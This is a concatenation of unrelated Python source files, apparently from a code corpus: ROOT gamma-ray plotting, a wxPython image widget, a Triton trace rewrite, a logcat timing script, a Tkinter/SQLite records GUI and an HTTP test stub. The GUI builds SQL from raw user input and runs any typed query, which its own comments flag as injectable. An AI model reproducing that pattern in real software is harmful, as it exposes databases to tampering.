greOn[0][1].SetPoint(greOn[0][1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif c[0] == 2:
if s[0] == 4096:
greOn[1][0].SetPoint(greOn[1][0].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 8192:
greOn[1][1].SetPoint(greOn[1][1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 16384:
greOn[1][2].SetPoint(greOn[1][2].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif iRegio>0:
flag[0] = iRegio
if s[0]>0:
#print ""
#print "== OFF{0} photon candidate! ==".format(iRegio)
if c[0] == 1:
if s[0] == 4:
greOff[0][0][iRegio-1].SetPoint(greOff[0][0][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 128:
greOff[0][1][iRegio-1].SetPoint(greOff[0][1][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif c[0] == 2:
if s[0] == 4096:
greOff[1][0][iRegio-1].SetPoint(greOff[1][0][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 8192:
greOff[1][1][iRegio-1].SetPoint(greOff[1][1][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
elif s[0] == 16384:
greOff[1][2][iRegio-1].SetPoint(greOff[1][2][iRegio-1].GetN(), t[0]-trigger_time, pow(10, e[0]-3))
if s[0]>0 and iRegio==0:
print "Event No.", iEvent
print "Event category:", cfg.aStrSelect[c[0]-1]
print "Event class:", s[0]
print "Time from the trigger:", t[0]-trigger_time, "s"
print "Anglular distance:", dist[0], "deg"
print "PSF68:", htgPerf.getPSF68_cth(c[0]-1, 0*(s[0]==4 or s[0]==4096)+1*(s[0]==128 or s[0]==8192)+2*(s[0]==16384), e[0], cth[0]), "deg"
print "Energy:", pow(10,e[0]-3), "GeV"
print "Edisp68:", 100*htgPerf.getEdisp68_cth(c[0]-1, 0*(s[0]==4 or s[0]==4096)+1*(s[0]==128 or s[0]==8192)+2*(s[0]==16384), e[0], cth[0]), "%"
print "Cos( inclination angle ):", cth[0]
print "Zenith angle:", z[0], "deg"
print "Run ID:", run[0]
print "Event ID:", evid[0]
trm.Fill()
# trm.Fill()
if iEvent%(nEvent/200)==0:
rate = int((iEvent*100.)/nEvent+0.5)
if rate>0:
nt = (datetime.datetime.now() - timeStart).seconds * (100.-rate)/rate
meter = "\r[{0}{1}] {2} Wait {3} hr {4} min".format("=" * rate, ' ' * (100-rate), aaNumEventClass, int(nt/3600), (int(nt)%3600)/60+1)
else:
meter = "\r[{0}{1}]".format("=" * rate, ' ' * (100-rate))
sys.stdout.write(meter)
sys.stdout.flush()
cEvent = ROOT.TCanvas("cEvent", "GRB {0} gamma-like events within {1} deg".format(nameGrb, distCut))
cEvent.cd()
mgr.Draw("AP")
mgr.GetXaxis().SetTitle("Time [s]")
mgr.GetYaxis().SetTitle("Energy [GeV]")
leg = ROOT.TLegend(0.67, 0.5, 0.88, 0.88)
for pD in range(len(aaStrSelect)):
for qD in range(len(aaStrSelect[pD])):
leg.AddEntry(greOn[pD][qD], greOn[pD][qD].GetTitle(), "p")
for rr in range(nOff):
leg.AddEntry(greOff[1][0][rr], "OFF{0}".format(rr+1), "p")
leg.Draw("same")
cZenith = ROOT.TCanvas("cZenith", "Zenith angle of ON/OFF events")
cZenith.cd()
mgrZenith.Draw("AP")
mgrZenith.GetXaxis().SetTitle("Time [s]")
mgrZenith.GetYaxis().SetTitle("Zenith angle [deg]")
legZenith = ROOT.TLegend(0.67, 0.5, 0.88, 0.88)
for rz in range(nOff+1):
legZenith.AddEntry(grZenith[rz], grZenith[rz].GetTitle(), "p")
legZenith.Draw("same")
print ""
fileOut.cd()
trm.Write()
cEvent.Write()
cZenith.Write()
print "Finished!"
|
5,161 | d4198c2c3706e03ba1bce3e31c5139f01248a184 | #------------------------------------------------------------------------------
# Copyright (c) 2011, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
import wx
from .wx_control import WXControl
from ...components.image_view import AbstractTkImageView
class wxBitmapWidget(wx.Panel):
""" A wx.Panel subclass which paints a provided wx.Bitmap.
This differs from wx.StaticBitmap in that it provides the option to
scale the provided bitmap to the bounds of the widget. If the widget
is set to scale its contents, low quality scaling will occur during
resize, with a high quality pass performed once resizing as finished.
"""
def __init__(self, parent):
""" Initialize a wxBitmapWidget.
Parameters
----------
parent : wx.Window
The wx.Window object which serves as the widget parent.
"""
super(wxBitmapWidget, self).__init__(parent)
self._bitmap = None
self._scaled_contents = False
self._preserve_aspect_ratio = False
self._allow_upscaling = False
self._resize_timer = None
self._resizing = False
self.Bind(wx.EVT_PAINT, self.OnPaint)
#--------------------------------------------------------------------------
# Private API
#--------------------------------------------------------------------------
def OnPaint(self, event):
""" The paint event handler for the widget.
"""
bmp = self._bitmap
if bmp is None:
return
bmp_width, bmp_height = bmp.GetWidth(), bmp.GetHeight()
if bmp_width == 0 or bmp_height == 0:
return
evt_x = 0
evt_y = 0
evt_width, evt_height = self.GetSize().asTuple()
if not self._scaled_contents:
# If the image isn't scaled, it is centered if possible.
# Otherwise, it's painted at the origin and clipped.
paint_x = max(0, int((evt_width / 2. - bmp_width / 2.) + evt_x))
paint_y = max(0, int((evt_height / 2. - bmp_height / 2.) + evt_y))
paint_width = bmp_width
paint_height = bmp_height
else:
# If the image *is* scaled, it's scaled size depends on the
# size of the paint area as well as the other scaling flags.
if self._preserve_aspect_ratio:
bmp_ratio = float(bmp_width) / bmp_height
evt_ratio = float(evt_width) / evt_height
if evt_ratio >= bmp_ratio:
if self._allow_upscaling:
paint_height = evt_height
else:
paint_height = min(bmp_height, evt_height)
paint_width = int(paint_height * bmp_ratio)
else:
if self._allow_upscaling:
paint_width = evt_width
else:
paint_width = min(bmp_width, evt_width)
paint_height = int(paint_width / bmp_ratio)
else:
if self._allow_upscaling:
paint_height = evt_height
paint_width = evt_width
else:
paint_height = min(bmp_height, evt_height)
paint_width = min(bmp_width, evt_width)
# In all cases of scaling, we know that the scaled image is
# no larger than the paint area, and can thus be centered.
paint_x = int((evt_width / 2. - paint_width / 2.) + evt_x)
paint_y = int((evt_height / 2. - paint_height / 2.) + evt_y)
# Scale the bitmap if needed, using a faster method if the
# image is currently being resized
if paint_width != bmp_width or paint_height != bmp_height:
img = bmp.ConvertToImage()
if self._resizing:
quality = wx.IMAGE_QUALITY_NORMAL
else:
quality = wx.IMAGE_QUALITY_HIGH
img.Rescale(paint_width, paint_height, quality)
bmp = wx.BitmapFromImage(img)
# Finally, draw the bitmap into the computed location
dc = wx.PaintDC(self)
dc.DrawBitmap(bmp, paint_x, paint_y)
def OnResize(self, event):
""" The resize event handler for the widget.
This method is only bound and called when content scaling is
enabled. It starts(restarts) a timer to perform a high quality
scaled repaint when resizing is finished.
"""
self._resizing = True
self._resize_timer.Start(60, True)
def OnResizeEnd(self, event):
""" The repaint timer event handler.
This method is only bound and called when content scaling is
enabled and resizing has completed. It triggers a high quality
repaint.
"""
self._resizing = False
self.Refresh()
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def GetBestSize(self):
""" Overridden method to return the size of the bitmap as the
best size for the widget.
"""
bmp = self._bitmap
return wx.Size(bmp.GetWidth(), bmp.GetHeight())
def GetBestSizeTuple(self):
""" Overridden method to return the size of the bitmap as the
best size for the widget.
"""
return self.GetBestSize().asTuple()
def GetBitmap(self, bitmap):
""" Get the underlying wx.Bitmap used to paint the control.
Returns
-------
result : wx.Bitmap or None
The bitmap being used to paint the control, or None if
no bitmap has been supplied.
"""
return self._bitmap
def SetBitmap(self, bitmap):
""" Set the underlying wx.Bitmap and refresh the widget.
Parameters
----------
bitmap : wx.Bitmap
The bitmap to paint on the widget.
"""
self._bitmap = bitmap
self.Refresh()
def GetScaledContents(self):
""" Whether or not the bitmap is scaled to fit the bounds.
Returns
-------
result : bool
Whether or not the bitmap is scaled to fit the bounds of
the widget.
"""
return self._scaled_contents
def SetScaledContents(self, scaled):
""" Set whether or not the bitmap should be scaled to fit the
bounds of the widget.
Parameters
----------
scaled : bool
Whether or not to scale the bitmap to fit the bounds of the
widget.
"""
if scaled:
if not self._scaled_contents:
self._scaled_contents = True
self._resize_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnResizeEnd)
self.Bind(wx.EVT_SIZE, self.OnResize)
else:
if self._scaled_contents:
self._scaled_contents = False
self._timer = None
self.Unbind(wx.EVT_TIMER, handler=self.OnResizeEnd)
self.Unbind(wx.EVT_SIZE, handler=self.OnResize)
self.Refresh()
def GetPreserveAspectRatio(self):
""" Returns whether or not the aspect ratio of the image is
maintained during a resize.
"""
return self._preserve_aspect_ratio
def SetPreserveAspectRatio(self, preserve):
""" Set whether or not to preserve the image aspect ratio.
Parameters
----------
preserve : bool
If True then the aspect ratio of the image will be preserved
if it is scaled to fit. Otherwise, the aspect ratio will be
ignored.
"""
self._preserve_aspect_ratio = preserve
self.Refresh()
def GetAllowUpscaling(self):
""" Returns whether or not the image can be scaled greater than
its natural size.
"""
return self._allow_upscaling
def SetAllowUpscaling(self, allow):
""" Set whether or not to allow the image to be scaled beyond
its natural size.
Parameters
----------
allow : bool
If True, then the image may be scaled larger than its
natural if it is scaled to fit. If False, the image will
never be scaled larger than its natural size. In either
case, the image may be scaled smaller.
"""
self._allow_upscaling = allow
self.Refresh()
class WXImageView(WXControl, AbstractTkImageView):
""" A Wx implementation of ImageView.
"""
#: The internal cached size hint which is used to determine whether
#: of not a size hint updated event should be emitted when the text
#: in the label changes
_cached_size_hint = None
#--------------------------------------------------------------------------
# Setup methods
#--------------------------------------------------------------------------
def create(self, parent):
""" Creates the underlying wxBitmapWidget control.
"""
self.widget = wxBitmapWidget(parent)
def initialize(self):
""" Initializes the attributes on the underlying control.
"""
super(WXImageView, self).initialize()
shell = self.shell_obj
self.set_image(shell.image)
self.set_scale_to_fit(shell.scale_to_fit)
self.set_preserve_aspect_ratio(shell.preserve_aspect_ratio)
self.set_allow_upscaling(shell.allow_upscaling)
#--------------------------------------------------------------------------
# Implementation
#--------------------------------------------------------------------------
def shell_image_changed(self, image):
""" The change handler for the 'image' attribute on the shell
component.
"""
self.set_image(image)
def shell_scale_to_fit_changed(self, scale_to_fit):
""" The change handler for the 'scale_to_fit' attribute on the
shell component.
"""
self.set_scale_to_fit(scale_to_fit)
def shell_preserve_aspect_ratio_changed(self, preserve):
""" The change handler for the 'preserve_aspect_ratio' attribute
on the shell component.
"""
self.set_preserve_aspect_ratio(preserve)
def shell_allow_upscaling_changed(self, allow):
""" The change handler for the 'allow_upscaling' attribute on
the shell component.
"""
self.set_allow_upscaling(allow)
#--------------------------------------------------------------------------
# Widget Update Methods
#--------------------------------------------------------------------------
def set_image(self, image):
""" Sets the image on the underlying wxBitmapWidget.
"""
bmp = image.as_wxBitmap() if image is not None else None
self.widget.SetBitmap(bmp)
# Emit a size hint updated event if the size hint has actually
# changed. This is an optimization so that a constraints update
# only occurs when the size hint has actually changed. This
# logic must be implemented here so that the label has been
# updated before the new size hint is computed. Placing this
# logic on the shell object would not guarantee that the label
# has been updated at the time the change handler is called.
cached = self._cached_size_hint
hint = self._cached_size_hint = self.size_hint()
if cached != hint:
self.shell_obj.size_hint_updated()
def set_scale_to_fit(self, scale_to_fit):
""" Sets whether or not the image scales with the underlying
control.
"""
self.widget.SetScaledContents(scale_to_fit)
def set_preserve_aspect_ratio(self, preserve):
""" Sets whether or not to preserve the aspect ratio of the
image when scaling.
"""
self.widget.SetPreserveAspectRatio(preserve)
def set_allow_upscaling(self, allow):
""" Sets whether or not the image will scale beyond its natural
size.
"""
self.widget.SetAllowUpscaling(allow)
|
5,162 | 22d3ff0fca9a5537da37bfbc968d83ec6f919752 | #!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys

# This script was machine-generated (a Triton symbolic-execution trace of an
# obfuscated binary): ~200 lines of ref_N = ref_M copy chains around a handful
# of real operations. The rewrite below collapses the copy chains into the
# underlying computation; every line is annotated with the ref_N it replaces.
# It reads one integer from argv[1] and prints a 64-bit mixed value of it.

M = 0xFFFFFFFFFFFFFFFF  # 64-bit mask


def _rotl64(v, n):
    """Rotate the 64-bit value v left by n bits (1 <= n <= 63)."""
    return ((v << n) & M) | (v >> (64 - n))


def _swap07(v):
    """Swap the least- and most-significant bytes of a 64-bit value.

    Mirrors the byte-reference reassembly in the original trace
    (ref_39053 / ref_60323): bytes 1..6 keep their positions.
    """
    return (v & 0x00FFFFFFFFFFFF00) | ((v & 0xFF) << 56) | ((v >> 56) & 0xFF)


x = int(sys.argv[1])                     # SymVar_0

a = 0x1F8797B2 & (0x1F02C962 | x)        # ref_5915 (fits in 29 bits)
b = a & x                                # ref_9598
# ref_10637: signed 64-bit multiply then 64-bit mask == low 64 bits of product.
c = (0x66AF1DF * x) & M
d = (_rotl64(b, 57) + c) & M             # ref_13007 + ref_10637 -> ref_14054
f = ((b & 7) << 2) | d                   # ref_27606
g = _swap07(f)                           # ref_39053
h = (((b & g) & 0x1F) << 4) | a          # ref_41317
f2 = ((g & 7) << 2) | ((4 * d) & M)      # ref_48876 (4*d == ref_45168)
g2 = _swap07(f2)                         # ref_60323
h = (((g & g2) & 0x1F) << 4) | h         # ref_62587

u = ((g | g2) & 0xF) | 1                 # ref_74700, in [1, 15]
t = ((b >> 1) & 0xF) | 1                 # ref_71084, in [1, 15]
r = _rotl64(h, 64 - t)                   # ref_80257: rotate right by t
# parenthesised print works identically on Python 2 and 3
print(_rotl64(r, u) & 0xffffffffffffffff)    # ref_81555
|
5,163 | 585c0f89605f1d791b449f42412174f06d0c5db5 | # -*- coding: utf-8 -*-
# !/usr/bin/python
import re
import sys
import xlwt
import os
'''
python logcat_time.py config_file logcat_file
'''
config_file = sys.argv[1]
logcat_file = sys.argv[2]
turns_time = 0
turn_compelete_flag = 0
def get_filePath_fileName_fileExt(filename):
    """Split *filename* into (directory path, base name, extension).

    E.g. '/tmp/run.log' -> ('/tmp', 'run', '.log').
    """
    filepath, tempfilename = os.path.split(filename)
    shotname, extension = os.path.splitext(tempfilename)
    return filepath, shotname, extension
#时间字串模板09:52:24.761
def time_str_distance(old_time_str, new_time_str):
    """Return (new - old) in milliseconds.

    Both arguments are 'HH:MM:SS.mmm' logcat timestamps (e.g. '09:52:24.761').
    The result is negative when *new_time_str* is earlier than *old_time_str*.
    """
    def to_millis(stamp):
        # list() keeps this working on Python 3, where map() is a lazy
        # iterator and the original rst[i] indexing raised TypeError.
        hours, minutes, seconds, millis = list(map(int, re.split(r'[:.]', stamp)))
        return ((hours * 60 + minutes) * 60 + seconds) * 1000 + millis

    return to_millis(new_time_str) - to_millis(old_time_str)
def read_tag_pair_config(file_path):
    """Read the tag-pair config file at *file_path*.

    Each non-blank line holds '@'-separated fields (name@start_tag@end_tag).
    Returns (pair_list, pair_count).
    """
    pair_list = []
    # 'with' guarantees the handle is closed (the original leaked it).
    with open(file_path) as config:
        for line in config:
            line = line.strip()
            if not line:
                # Skip blank lines: the original appended [''] for them,
                # which crashes consumers that index pair[1] / pair[2].
                continue
            pair_list.append(line.split('@'))
    return pair_list, len(pair_list)
def caculate_tag_distance(str1, str2):
    """Scan the global *logcat_file* and print, for every line containing
    *str2*, the millisecond distance from the most recent *str1* line.

    NOTE(review): the flag is reset to False on every line, so the
    distance is printed only for lines that themselves contain str2;
    turn_times therefore counts str2 occurrences, not completed turns.
    NOTE(review): the file handle is never closed, and start_time may
    still be '' if str2 appears before any str1 — TODO confirm intent.
    """
    f = open(logcat_file)
    finish_time = ''
    start_time = ''
    turn_times = 0
    for line in f:
        turn_compelete_flag = False
        if str1 in line:
            turn_compelete_flag = False
            # logcat column 1 is the timestamp (HH:MM:SS.mmm)
            start_time = line.split()[1]
        if str2 in line:
            turn_compelete_flag = True
            finish_time = line.split()[1]
        if turn_compelete_flag:
            turn_times = turn_times + 1
            str_distance = time_str_distance(start_time, finish_time)
            print str_distance
def generate_excel(plist_time_pair,pair_count):
    """Write the collected timestamp pairs to '<logcat-name>_out.xls'.

    *plist_time_pair* is a list of "turns"; each turn is a list of
    pair_count [start, finish] timestamp pairs. One worksheet row per
    turn: a column per tag pair plus a total-time column.
    NOTE(review): reads the module globals tag_pair_list and logcat_file.
    """
    result_sheet = xlwt.Workbook(encoding='utf-8')
    sheet = result_sheet.add_sheet('result')
    # generate the header row (one column per configured tag pair)
    i = 0
    for pair in tag_pair_list:
        sheet.write(0, i, pair[0])
        i = i + 1
    sheet.write(0, i, "总时间")
    # generate the data rows
    j = 1
    c = 0
    for time_pair in plist_time_pair:
        print "----------------------------"
        m = 0
        #print time_pair, c
        for tag_time_pair in time_pair:
            time_distance = time_str_distance(tag_time_pair[0], tag_time_pair[1])
            sheet.write(j, m, time_distance)
            m = m + 1
            print "---->",time_distance
        # total = first pair's start to last pair's finish
        start_time_point = time_pair[0][0]
        finish_time_point = time_pair[pair_count - 1][1]
        all_time = time_str_distance(start_time_point, finish_time_point)
        sheet.write(j, m, all_time)
        c = c + 1
        j = j + 1
    (file_p, file_s, file_e) = get_filePath_fileName_fileExt(logcat_file)
    result_sheet.save(file_s + '_out.xls')
    print ("Finished save output to excel!")
# Main pass: walk the logcat once, filling time_stamp[i] = [start, finish]
# for tag pair i; when the last pair completes with all slots filled, the
# turn is appended to list_time_pair and the scratch array is reset.
(tag_pair_list,pair_count) = read_tag_pair_config(config_file)
time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)]
f = open(logcat_file)
list_time_pair = []
for line in f:
    i = 0
    if line == '\n':
        continue
    for pair in tag_pair_list:
        # pair layout is name@start_tag@end_tag (from the config file)
        if pair[1].strip() in line:
            time_stamp[i][0] = line.split()[1]
        if pair[2].strip() in line:
            time_stamp[i][1] = line.split()[1]
            if i == pair_count - 1:
                # last pair's end tag seen: check every slot was filled
                compeled_flag = False
                for tm_st in time_stamp:
                    if tm_st[0] == 0 or tm_st[1] == 0:
                        compeled_flag = False
                        break
                    else:
                        compeled_flag = True
                if compeled_flag:
                    list_time_pair.append(time_stamp)
                    all_time = time_str_distance(time_stamp[0][0], time_stamp[pair_count - 1][1])
                    #print "all time:", all_time
                    # reset the 2-D scratch array for the next turn
                    time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)]
        i = i + 1
print '=================='
generate_excel(list_time_pair,pair_count)
5,164 | 4c6b04716f41c3413896f0d59f2cc9b1475d7f64 | from tkinter import*
from tkinter import filedialog
import sqlite3
class Gui:
    """Tkinter front-end for browsing/editing the 'user' table in the
    student_details.db SQLite database.

    NOTE(review): SQL statements throughout are built with str.format on
    raw Entry text — vulnerable to SQL injection; should use parameterized
    queries. Several widgets are shared through module-level globals
    (e, e1..e5) rather than instance attributes.
    """
    def __init__(self):
        # Build the main window: top button bar (f1), left table list,
        # right record list + free-form query box; then enter mainloop.
        global en3
        self.scr = Tk()
        self.scr.geometry("2000x3000")
        self.scr.title("VIEWING DATABASE")
        self.connection = sqlite3.connect("student_details.db")
        self.cursor = self.connection.cursor()
        self.id = StringVar()
        self.name1 = StringVar()
        self.fathername = StringVar()
        self.mothername = StringVar()
        self.cont = StringVar()
        self.email = StringVar()
        self.f1 = Frame(self.scr, bg='brown1')
        self.f1.pack(side=TOP)
        self.left_frame = Frame(self.scr, bg='red')
        self.left_frame.pack(side=LEFT, fill=Y)
        self.right_frame = Frame(self.scr, width=3000, bg='yellow')
        self.right_frame.pack(side=LEFT, fill=Y)
        l = Label(self.right_frame, text="***************SHOW TABLE RECORDS IN A DATABASE******************",
                  font=('times', 25, 'bold'), bg="black", fg="white")
        l.pack(side=TOP, fill=X)
        scrollbar = Scrollbar(self.right_frame)
        scrollbar.pack(side=RIGHT, fill=Y)
        self.list = Listbox(self.right_frame, width=61, height=12, font=('times', 25, 'bold'),
                            yscrollcommand=scrollbar.set)
        # NOTE(review): "student_list" is not a Tk event sequence, so this
        # binding likely never fires — TODO confirm intended event.
        self.list.bind("student_list", self.show_records)
        self.list.pack(side=TOP, fill=Y)
        scrollbar.config(command=self.list.yview)
        self.querry_frame = Frame(self.right_frame, width=81, height=5, bg="white")
        self.querry_frame.pack(side=BOTTOM, fill=X)
        self.en3 = Entry(self.querry_frame, font=('times', 25, 'bold'))
        self.en3.pack(side=BOTTOM, fill=X)
        b = Button(self.querry_frame, text="Enter",command=self.sample, font=('times', 25, 'bold'), bg="white", fg="black")
        b.pack(side=RIGHT)
        b1 = Button(self.querry_frame, text="Save", command=self.show_data, font=('times', 25, 'bold'), bg="white",
                    fg="black")
        b1.pack(side=RIGHT)
        b = Button(self.f1, text="OPEN", command=self.file, font=('times', 25, 'bold'), bg="white", fg="black")
        b.pack(side=LEFT)
        b = Button(self.f1, text="CREATE", command=self.create_table, font=('times', 25, 'bold'), bg="white",
                   fg="black")
        b.pack(side=LEFT)
        b1 = Button(self.f1, text="INSERT", command=self.add_record, font=('times', 25, 'bold'), bg="white",
                    fg="black")
        b1.pack(side=LEFT)
        b2 = Button(self.f1, text="DELETE", command=self.del_rec, font=('times', 25, 'bold'), bg="white",
                    fg="black")
        b2.pack(side=LEFT)
        b3 = Button(self.f1, text="UPDATE", command=self.update, font=('times', 25, 'bold'), bg="white",
                    fg="black")
        b3.pack(side=RIGHT)
        b4 = Button(self.f1, text="VIEW", command=lambda: self.view_table(), font=('times', 25, 'bold'), bg="white",
                    fg="black")
        b4.pack(side=RIGHT)
        b4 = Button(self.f1, text="BROWSE", command=self.show_data, font=('times', 25, 'bold'), bg="white",
                    fg="black")
        b4.pack(side=RIGHT)
        l = Label(self.left_frame, text="View Table in Database", font=('times', 25, 'bold'), bg='blue', fg='white')
        l.pack(side=TOP, fill=X)
        self.scr.mainloop()
        # NOTE(review): this table-creation code sits AFTER mainloop(), so
        # it only runs once the window is closed — probably misplaced.
        try:
            self.cursor.execute("create table user(Id varchar(10),Name varchar(30),FathersName varchar(20),MothersName varchar(20),Contact varchar(10),Email varchar(30))")
            self.connection.commit()
        except:
            pass
    def insert_data(self):
        # Read the six global entry widgets (created by add_record) and
        # insert one row into 'user'.
        self.id = e.get()
        self.name1 = e1.get()
        self.fathername=e2.get()
        self.mothername = e3.get()
        self.cont = e4.get()
        self.email = e5.get()
        self.cursor.execute("insert into user values('{}','{}','{}','{}','{}','{}')".format(self.id,self.name1, self.fathername,self.mothername,self.cont , self.email))
        self.connection.commit()
    def show_data(self):
        # Re-open the DB and append every 'user' row to the right listbox.
        self.connection = sqlite3.connect("student_details.db")
        self.cursor = self.connection.cursor()
        self.cursor.execute("Select * from user")
        rows = self.cursor.fetchall()
        for row in rows:
            l1 = self.list.insert(END, row)
        self.connection.commit()
    def update_data(self):
        # Apply the UPDATE typed into the dialog built by update(), then
        # refresh the listbox.
        self.cursor.execute("Update user set {} = '{}' where id ='{}'".format(e2.get(),e3.get(),e.get()))
        self.connection.commit()
        self.list.delete(0, END)
        self.show_data()
    def update(self):
        # Dialog asking for (id, column name, new value) for update_data().
        global e
        global e2
        global e3
        self.top1 = Toplevel(self.scr)
        self.top1.geometry("400x400")
        l1 = Label(self.top1, text="USER_ID", font=('times', 25, 'bold'), bg="green2", fg="white")
        l1.pack()
        self.Id=StringVar()
        e = Entry(self.top1, relief="sunken", textvariable=self.Id, font=('times', 25, 'bold'))
        e.pack()
        self.col_name=StringVar()
        l2 = Label(self.top1, text="col_name", font=('times', 25, 'bold'), bg="green2", fg="white")
        l2.pack()
        e2 = Entry(self.top1, relief="sunken", textvariable=self.col_name, font=('times', 25, 'bold'))
        e2.pack()
        self.value=StringVar()
        l3 = Label(self.top1, text="VALUE", font=('times', 25, 'bold'), bg="green2", fg="white")
        l3.pack()
        e3 = Entry(self.top1, relief="sunken", textvariable=self.value, font=('times', 25, 'bold'))
        e3.pack()
        b = Button(self.top1, text="UPDATE", command=self.update_data, font=('times', 25, 'bold'), bg="white",
                   fg="black")
        b.pack()
        self.top1.mainloop()
    def delete_data(self):
        # Delete the row whose id was typed into the del_rec() dialog.
        self.cursor.execute("Delete from user where id ='{}'".format(e.get()))
        self.list.delete(0,END)
        self.connection.commit()
        self.show_data()
    def del_rec(self):
        # Dialog asking for the id to delete.
        global e
        self.top2 = Toplevel(self.scr)
        self.top2.geometry("400x400")
        l1 = Label(self.top2, text="USER_ID", font=('times', 25, 'bold'), bg="green2", fg="white")
        l1.pack()
        self.Id = StringVar()
        e = Entry(self.top2, relief="sunken", textvariable=self.Id, font=('times', 25, 'bold'))
        e.pack()
        b = Button(self.top2, text="delete records", command=self.delete_data, font=('times', 25, 'bold'), bg="white",
                   fg="black")
        b.pack()
        self.top2.mainloop()
    def sample(self):
        # Execute whatever SQL the user typed into en3 and show the rows.
        # NOTE(review): executes arbitrary user SQL by design.
        s=('{}'.format(self.en3.get()))
        a=self.cursor.execute("{}".format(self.en3.get()))
        r=self.cursor.fetchall()
        for row in r:
            self.list.insert(0,row)
        self.connection.commit()
    def file(self):
        # Pick a file via a dialog and show its path in the listbox.
        self.f1.filename = filedialog.askopenfilename( title="Select file")
        p=self.f1.filename
        self.list.insert(0,self.f1.filename)
    def add_record(self):
        # Dialog with six entries for a new 'user' row; SUBMIT calls
        # insert_data(), which reads the global entry widgets e..e5.
        global e
        global e1
        global e2
        global e3
        global e4
        global e5
        self.e = StringVar()
        self.e1 = StringVar()
        self.e2 = StringVar()
        self.e3 = StringVar()
        self.e4 = StringVar()
        self.e5 = StringVar()
        self.top=Toplevel(self.scr)
        self.top.geometry("400x800")
        l=Label(self.top,text="USER_ID",font=('times',25,'bold'),bg="green2",fg="white")
        l.pack()
        e=Entry(self.top,relief="sunken",textvariable=self.e,font=('times',25,'bold'))
        e.pack()
        l1 = Label(self.top, text="USERNAME", font=('times', 25, 'bold'), bg="green2", fg="white")
        l1.pack()
        e1 = Entry(self.top, relief="sunken",textvariable=self.e1, font=('times', 25, 'bold'))
        e1.pack()
        l2 = Label(self.top, text="FATHERS NAME", font=('times', 25, 'bold'), bg="green2", fg="white")
        l2.pack()
        e2 = Entry(self.top, relief="sunken",textvariable=self.e2, font=('times', 25, 'bold'))
        e2.pack()
        l3 = Label(self.top, text="MOTHERS NAME", font=('times', 25, 'bold'), bg="green2", fg="white")
        l3.pack()
        e3 = Entry(self.top, relief="sunken",textvariable=self.e3, font=('times', 25, 'bold'))
        e3.pack()
        l4 = Label(self.top, text="CONTACT NO", font=('times', 25, 'bold'), bg="green2", fg="white")
        l4.pack()
        e4 = Entry(self.top, relief="sunken",textvariable=self.e4, font=('times', 25, 'bold'))
        e4.pack()
        l5 = Label(self.top, text="E-MAIL ID", font=('times', 25, 'bold'), bg="green2", fg="white")
        l5.pack()
        e5 = Entry(self.top, relief="sunken",textvariable=self.e5, font=('times', 25, 'bold'))
        e5.pack()
        varchk=IntVar()
        b = Button(self.top, text="SUBMIT", command=self.insert_data,font=('times', 25, 'bold'), bg="white",fg="black")
        b.pack()
        self.top.mainloop()
    def view_table(self):
        # Populate the left-hand listbox with known table names.
        global list_box
        self.list_box = Listbox(self.left_frame, font=('times', 20, 'bold'))
        try:
            self.list_box.insert(1,"user")
            self.list_box.insert(2,self.tbl_name)
        except:
            pass
        b=Button(self.left_frame,text="Click",font=('times', 20, 'bold'),command=self.selection,bg="white",fg="black")
        b.place(x=100,y=400)
        self.list_box.place(x=10,y=50)
    def selection(self):
        # Show records for each table selected in the left listbox.
        lb = self.list_box.curselection()
        print(lb)
        for i in list(lb):
            self.show_data()
    def show_records(self):
        # Handler for the (likely dead) listbox binding in __init__.
        global m
        m=self.list.curselection()
        m=self.list.get(m)
        self.id.delete(0,END)
        self.id.insert(END,self.add_record())
    global table_name
    def create_table(self):
        # Dialog to name a new table and add one (name, type) field.
        self.top = Toplevel(self.scr)
        self.top.geometry("400x800")
        self.table_name=StringVar()
        l=Label(self.top,text="Table",font=('times', 20, 'bold'),bg="white",fg="black")
        l.pack()
        e=Entry(self.top,textvariable=self.table_name,font=('times', 20, 'bold'))
        e.pack()
        b=Button(self.top,text="Add field",command=self.fun_show , font=('times', 20, 'bold'),bg="white",fg="black")
        b.pack()
        b=Button(self.top,text="OK",font=('times', 20, 'bold'),command=self.show_entered_data,bg="white",fg="black")
        b.pack(side=RIGHT)
    def show_entered_data(self):
        # Build and execute the CREATE TABLE statement from the dialog
        # fields, echoing it into the dialog and the main listbox.
        global en1
        global en2
        global list1
        global tbl_name
        self.tbl_name=self.table_name.get()
        self.en1=self.entry1.get()
        self.en2=self.entry2.get()
        sent="Create table "+str(self.tbl_name)+"('"+str(self.en1)+ " "+ str(self.en2)+"')"
        list1 = Text(self.top, width=41, height=8, font=('times', 25, 'bold'))
        list1.place(x=0,y=0)
        list1.insert(0.0,sent)
        print(self.tbl_name,self.en1,self.en2)
        self.cursor.execute(sent)
        self.list.insert(0,sent)
        self.connection.commit()
    def fun_show(self):
        # Append one (field name, field type) entry pair to the
        # create-table dialog.
        l = Label(self.top, text="Name", font=('times', 20, 'bold'), bg="white", fg="black")
        l.pack(side=TOP)
        self.entry1 = StringVar()
        e1 = Entry(self.top, textvariable=self.entry1, font=('times', 20, 'bold'))
        e1.pack()
        l = Label(self.top, text="type", font=('times', 20, 'bold'), bg="white", fg="black")
        l.pack(side=TOP)
        self.entry2 = StringVar()
        e1 = Entry(self.top, textvariable=self.entry2, font=('times', 20, 'bold'))
        e1.pack()
Gui() |
5,165 | cd9b04a93d85ba0ee2a38b534386f9aec0ef6895 | import httplib
import sys
# Simple end-to-end tester (Python 2, httplib): sends each line of
# 'test_input' to a local HTTP server and compares the body against the
# matching line of 'expected'.
http_server = "localhost:8000"
connection = httplib.HTTPConnection(http_server)
# Open test input.
test_file_path = "test_input"
test_f = open(test_file_path)
inputs = test_f.readlines()
inputs = [x.strip() for x in inputs]
test_f.close()
